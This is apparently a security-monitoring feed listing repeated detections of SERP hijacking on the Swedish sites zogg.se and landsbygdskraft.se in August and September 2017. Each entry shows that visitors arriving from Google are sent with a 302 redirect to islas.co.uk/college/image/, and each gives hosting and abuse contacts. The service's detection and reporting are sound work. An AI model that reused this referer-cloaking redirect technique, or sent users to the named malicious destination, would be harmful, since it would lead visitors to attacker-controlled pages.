Säkrare hemsida med .sehttp://zogg.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Fri, 15 Sep 2017 00:10:13 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Thu, 14 Sep 2017 22:10:22 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Cookie <br>X-Powered-By: PHP/5.6.30 <br>X-Pingback: http://zogg.se/xmlrpc.php <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Thu, 14 Sep 2017 22:10:20 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1505476194http://zogg.se/2013/01/01/vags-ande/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/2013/01/01/vags-ande/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 12 Sep 2017 19:14:21 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Tue, 12 Sep 2017 17:14:21 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Cookie <br>X-Powered-By: PHP/5.6.30 <br>X-Pingback: http://zogg.se/xmlrpc.php <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Tue, 12 Sep 2017 17:14:20 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1505312536http://zogg.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 12 Sep 2017 09:44:35 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Tue, 12 Sep 2017 07:44:35 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Tue, 12 Sep 2017 07:44:35 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1505221482http://zogg.se/2013/01/03/stadig-frukost/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/2013/01/03/stadig-frukost/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 11 Sep 2017 19:59:11 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Mon, 11 Sep 2017 17:59:11 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Mon, 11 Sep 2017 17:59:11 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1505220746http://zogg.se/page/2/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/page/2/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 11 Sep 2017 18:43:59 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Mon, 11 Sep 2017 16:43:59 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Mon, 11 Sep 2017 16:43:59 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1505220448http://landsbygdskraft.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://landsbygdskraft.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 11 Sep 2017 03:49:15 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: landsbygdskraft.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Mon, 11 Sep 2017 01:49:23 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Cookie <br>X-Powered-By: PHP/5.6.30 <br>X-Pingback: http://landsbygdskraft.se/xmlrpc.php <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: landsbygdskraft.se <br>Referer: http://www.google.com/search?q=landsbygdskraft.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Mon, 11 Sep 2017 01:49:22 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>landsbygdskraft.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1505113892http://zogg.se/2013/01/01/vags-ande/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/2013/01/01/vags-ande/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Sun, 10 Sep 2017 19:07:01 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Sun, 10 Sep 2017 17:07:09 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Sun, 10 Sep 2017 17:07:08 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1505113422http://zogg.se/2013/01/01/vags-ande/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/2013/01/01/vags-ande/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 07 Sep 2017 18:51:31 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Thu, 07 Sep 2017 16:51:31 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Thu, 07 Sep 2017 16:51:31 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1504869430http://zogg.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Fri, 25 Aug 2017 11:43:00 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Fri, 25 Aug 2017 09:43:00 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Cookie <br>X-Powered-By: PHP/5.6.30 <br>X-Pingback: http://zogg.se/xmlrpc.php <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Fri, 25 Aug 2017 09:43:00 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1503672305http://zogg.se/2013/01/03/stadig-frukost/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/2013/01/03/stadig-frukost/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 24 Aug 2017 18:12:35 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Thu, 24 Aug 2017 16:12:35 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Thu, 24 Aug 2017 16:12:34 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1503671717http://zogg.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 24 Aug 2017 06:01:06 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Thu, 24 Aug 2017 04:01:06 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Cookie <br>X-Powered-By: PHP/5.6.30 <br>X-Pingback: http://zogg.se/xmlrpc.php <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Thu, 24 Aug 2017 04:01:05 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1503562897http://zogg.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Sun, 20 Aug 2017 22:40:13 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Sun, 20 Aug 2017 20:40:13 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Sun, 20 Aug 2017 20:40:13 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1503317826http://zogg.se/2013/01/03/stadig-frukost/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/2013/01/03/stadig-frukost/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Sun, 20 Aug 2017 17:57:22 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Sun, 20 Aug 2017 15:57:26 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Sun, 20 Aug 2017 15:57:26 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1503317563http://zogg.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Fri, 18 Aug 2017 04:05:39 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Fri, 18 Aug 2017 02:05:39 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Fri, 18 Aug 2017 02:05:39 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1503059244http://zogg.se/page/2/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/page/2/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 17 Aug 2017 16:02:13 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Thu, 17 Aug 2017 14:02:13 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Cookie <br>X-Powered-By: PHP/5.6.30 <br>X-Pingback: http://zogg.se/xmlrpc.php <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Thu, 17 Aug 2017 14:02:12 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1503058462http://zogg.se/2013/01/03/stadig-frukost/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/2013/01/03/stadig-frukost/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 16 Aug 2017 17:31:49 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Wed, 16 Aug 2017 15:31:49 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Wed, 16 Aug 2017 15:31:49 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1502971026http://zogg.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 14 Aug 2017 16:40:55 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Mon, 14 Aug 2017 14:40:55 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Mon, 14 Aug 2017 14:40:55 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1502782170http://zogg.se/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 10 Aug 2017 17:55:58 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Thu, 10 Aug 2017 15:56:00 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Accept-Encoding,Cookie <br>X-Powered-By: PHP/5.6.30 <br>Cache-Control: max-age=3, must-revalidate <br>WP-Super-Cache: Served supercache file from PHP <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Thu, 10 Aug 2017 15:56:00 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information only)<br>194.9.94.194 corresponds with s407.loopia.se<br>Abuse.net has 1 reliable address(es) for loopia.se<br>Found address(es): abuse@loopia.se1502445119http://zogg.se/page/2/ (194.9.94.194) - Serp-hijackingAttacked url: http://zogg.se/page/2/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 10 Aug 2017 15:01:32 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Server: nginx/1.12.1 <br>Date: Thu, 10 Aug 2017 13:01:32 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: Cookie <br>X-Powered-By: PHP/5.6.30 <br>X-Pingback: http://zogg.se/xmlrpc.php <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: zogg.se <br>Referer: http://www.google.com/search?q=zogg.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Server: nginx/1.12.1 <br>Date: Thu, 10 Aug 2017 13:01:32 GMT <br>Content-Type: text/html; charset=UTF-8 <br>Connection: close <br>Vary: X-Forwarded-For <br>X-Powered-By: PHP/5.6.30 <br>Location: http://islas.co.uk/college/image/<br><br>zogg.se is on 194.9.94.194<br>ASN for 194.9.94.194: 39570<br>Abusix contact information: abuse@loopia.se (information 